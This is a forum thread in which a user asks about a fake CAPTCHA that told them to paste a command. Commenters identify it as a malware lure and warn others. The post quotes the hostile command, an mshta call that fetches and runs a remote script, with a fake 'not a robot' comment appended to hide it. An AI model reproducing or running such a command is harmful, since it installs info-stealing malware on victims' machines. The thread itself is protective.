this post was submitted on 02 Apr 2025
446 points (98.9% liked)

No Stupid Questions

39720 readers
1358 users here now

No such thing. Ask away!

!nostupidquestions is a community dedicated to being helpful and answering each others' questions on various topics.

The rules for posting and commenting, besides the rules defined here for lemmy.world, are as follows:

Rules (interactive)


Rule 1- All posts must be legitimate questions. All post titles must include a question.

All posts must be legitimate questions, and all post titles must include a question. Questions that are joke or trolling questions, memes, song lyrics as title, etc. are not allowed here. See Rule 6 for all exceptions.



Rule 2- Your question subject cannot be illegal or NSFW material.

Your question subject cannot be illegal or NSFW material. You will be warned first, banned second.



Rule 3- Do not seek mental, medical and professional help here.

Do not seek mental, medical and professional help here. Breaking this rule will not get you or your post removed, but it will put you at risk, and possibly in danger.



Rule 4- No self promotion or upvote-farming of any kind.

That's it.



Rule 5- No baiting or sealioning or promoting an agenda.

Questions which, instead of being of an innocuous nature, are specifically intended (based on reports and in the opinion of our crack moderation team) to bait users into ideological wars on charged political topics will be removed and the authors warned - or banned - depending on severity.



Rule 6- Regarding META posts and joke questions.

Provided it is about the community itself, you may post non-question posts using the [META] tag on your post title.

On fridays, you are allowed to post meme and troll questions, on the condition that it's in text format only, and conforms with our other rules. These posts MUST include the [NSQ Friday] tag in their title.

If you post a serious question on friday and are looking only for legitimate answers, then please include the [Serious] tag on your post. Irrelevant replies will then be removed by moderators.



Rule 7- You can't intentionally annoy, mock, or harass other members.

If you intentionally annoy, mock, harass, or discriminate against any individual member, you will be removed.

Likewise, if you are a member, sympathiser or a resemblant of a movement that is known to largely hate, mock, discriminate against, and/or want to take lives of a group of people, and you were provably vocal about your hate, then you will be banned on sight.



Rule 8- All comments should try to stay relevant to their parent content.



Rule 9- Reposts from other platforms are not allowed.

Let everyone have their own content.



Rule 10- Majority of bots aren't allowed to participate here. This includes using AI responses and summaries.



Credits

Our breathtaking icon was bestowed upon us by @Cevilia!

The greatest banner of all time: by @TheOneWithTheHair!

founded 2 years ago
MODERATORS
 

The text it wants me to run is the following:

mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163''

Looks like the site got hacked and wants be run malware, but I've never seen something like this before.

top 50 comments
sorted by: hot top controversial new old
[–] [email protected] 5 points 19 hours ago

This is not a captcha, it’s a trick. Don’t do it.

They copy malware into your clipboard and try to trick you into pasting that malware into an environment that will run it.

Delete/ignore and move along.

[–] [email protected] 65 points 2 days ago (1 children)

DO NOT FOLLOW THESE PROMPTS. This is a malicious prompt. It places malicious content in your clipboard, and requesting that you paste it into command prompt or powershell, which will infect you.

[–] [email protected] 16 points 2 days ago (1 children)

I know, but I like having the hackers on my computer, I just like the Idea that someone is paying attention to me and likes the same thing I do.

[–] [email protected] 6 points 2 days ago

You're making the local FBI field office jealous. Lol

[–] [email protected] 29 points 2 days ago* (last edited 2 days ago)

I saw a post on this like 6 months ago. It was called a lumma stealer

https://denwp.com/anatomy-of-a-lumma-stealer

[–] [email protected] 39 points 2 days ago

It's bad that this scam is running of course but, I have to say this particular scam has almost a nostalgic quality to it. It reminds me of the type of trickery that old school malware back in the day used to rely on to get on to people's computers. It's kind of quaint how unsophisticated it is and how much active work it requires of the victim to successfully infect them.

[–] [email protected] 222 points 2 days ago* (last edited 2 days ago) (1 children)

That looks like the site got hacked and wants you to run malware.

Also, you might want to edit the link to change the .s in the URL to [dot] so it doesn't linkify a likely malware link for other users.

[–] [email protected] 70 points 2 days ago (1 children)

I figured. That's why I didn't run it.

[–] [email protected] 62 points 2 days ago* (last edited 2 days ago) (1 children)

Not sure if you saw my edit since it was after you replied, but you might want to edit the post to change the .'s in the URL to [dot] so it doesn't linkify a likely malware link for other users.

[–] [email protected] 41 points 2 days ago (1 children)

Done. I also changed the numbers before, but then I didn't verify that I broke the link.

[–] [email protected] 18 points 2 days ago (1 children)

Probably just an identifier for tracking who ran it.

[–] [email protected] 5 points 2 days ago (1 children)

Nope it is definately malware. It put a command in your clipboard since websites can do this, and then asks you to open a command window to run the command. This command can easily cause you to get and remotely execute an executable. Because this is so obviously dangerous no legit site would ask you to do this.

[–] [email protected] 10 points 2 days ago

I was referring to the ?i=number part, just like google uses si for YouTube.

[–] [email protected] 158 points 2 days ago
[–] [email protected] 49 points 2 days ago

The "This is either phishing or a prank, in either case, fucking don't" type Captcha

[–] [email protected] 33 points 2 days ago

Which website gave you those instructions? Name and shame.

[–] [email protected] 42 points 2 days ago* (last edited 2 days ago) (1 children)

Lol this looks lile an April Fools prank.

Ctrl + V is paste, and most browsers do not require permission for the website to copy something into your clipboard (as opposed to pasting from your clipboard).

So a paste would just input code for your OS to run. Sus. Its obviously either malware or a prank.

[–] [email protected] 4 points 2 days ago

Lmao yeah, I thought "haha funny joke" but people were genuinely asking

For future reference, never run any script or code or command unless you know what it is and does

[–] [email protected] 67 points 2 days ago (1 children)

That's definitely trying to hack you.

[–] [email protected] 13 points 2 days ago* (last edited 2 days ago) (1 children)

From the instructions, I would say they are trying to convince them to hack themselves (and yes, I know, that's how 95% of hacking works... But is that only me, or this one is so obvious that it hurts?)

[–] [email protected] 7 points 2 days ago

It's not only you, but it definitely would fly over the heads of 95% of my co-workers.

[–] [email protected] 35 points 2 days ago (2 children)

It checks if you're both human AND not a bumbling tumbleweed.

[–] [email protected] 4 points 2 days ago

Highly sophisticated Darwinian CAPTCHA

[–] [email protected] 6 points 2 days ago

“A way out west there was this fella, fella I want to tell you about, fella by the name of Jeff Lebowski. At least, that was the handle his lovin' parents gave him, but he never had much use for it himself. This Lebowski, he called himself the Dude. Now, Dude, that's a name no one would self-apply where I come from. But then, there was a lot about the Dude that didn't make a whole lot of sense to me. And a lot about where he lived, like-wise. But then again, maybe that's why I found the place s'durned innarestin'.”

[–] [email protected] 20 points 2 days ago

Nice trick to feed your computer with a virus.

[–] [email protected] 29 points 2 days ago

A dangerous one for sure...

[–] [email protected] 48 points 2 days ago* (last edited 2 days ago) (3 children)

Yeah, doesn't mshta run JavaScript locally on Windows? This looks like a way to force you to run their script

I hope that URL isn't the real one, you don't want anyone trying it just to see what would happen

[–] [email protected] 28 points 2 days ago (1 children)

https://www.virustotal.com/gui/url/d735247640472ab4a405600193afdcfd3d3757d163f52d8a5a5dfa3176df58c3/detection

Possibly.
BTW, certain malware may be able to break out of a VM.
On the other, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.

[–] [email protected] 4 points 2 days ago (1 children)

I'm sure proper malware analysts have dedicated non-virtual machines they can just format between tests.

[–] [email protected] 4 points 2 days ago

Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn't be tampered with).

[–] [email protected] 3 points 2 days ago* (last edited 2 days ago)

mshta

I have no idea how somebody might come up with this braindead, unintuitive and irreproducable mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.

[–] [email protected] 3 points 2 days ago

I'm curious what the script does, I'd love to reverse engineer it but don't want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?

[–] [email protected] 27 points 2 days ago (2 children)

It's called the 'John Hammond attack'. Even though it existed before he added his 2 cents, what you see in your image is his addition.

Watch his video to see him explain it.

https://www.youtube.com/watch?v=Wm0kqSlyEjE

[–] [email protected] 21 points 2 days ago (4 children)

Well, if it was a Richard Hammond attack, it would probably crash itself.

[–] [email protected] 9 points 2 days ago

HAMMOND YOU BLITHERING IDIOT!

[–] [email protected] 6 points 2 days ago
[–] [email protected] 4 points 2 days ago

aye!!! man of culture

[–] [email protected] 3 points 2 days ago

And have it’s teeth whitened

[–] [email protected] 3 points 2 days ago

before he added his 2 cents

He spared no expense, huh.

[–] andybytes 12 points 2 days ago

DONT DO IT. Hahahhahah

[–] [email protected] 28 points 2 days ago (1 children)

Yea good thing you didn’t. MSHTA is the app that lets you run Microsoft HTML Apps (usually used for their help articles). Those can contain JavaScript or VBScript code. And since you’re pasting it in a Run box it’ll happily execute it, even if it’s a remote source.

Generally it would only run as your user (you’re not admin are you?), which would still be enough to make your life miserable, but it could also try to run known exploits and raise itself to admin and own your whole computer.

[–] [email protected] 6 points 2 days ago* (last edited 2 days ago) (1 children)

Why wouldn't a windows user be running as admin lol its windows. That said most of what you value is already in your user account anyway and privilege escalations are hardly unknown as well.

[–] [email protected] 23 points 2 days ago

Meanwhile me on linux be like :

[–] [email protected] 20 points 2 days ago

It absolutely is malware. The Text you see is a comment appended to the end of a command that'll download malicious software. The comment is placed in such a way that the command is out of frame.

[–] [email protected] 8 points 2 days ago

Hopefully a Rick roll

[–] [email protected] 3 points 2 days ago (1 children)

I do strongly encourage everyone to go back to pen and paper.

sort of /s but also sort of not /s

load more comments
view more: next ›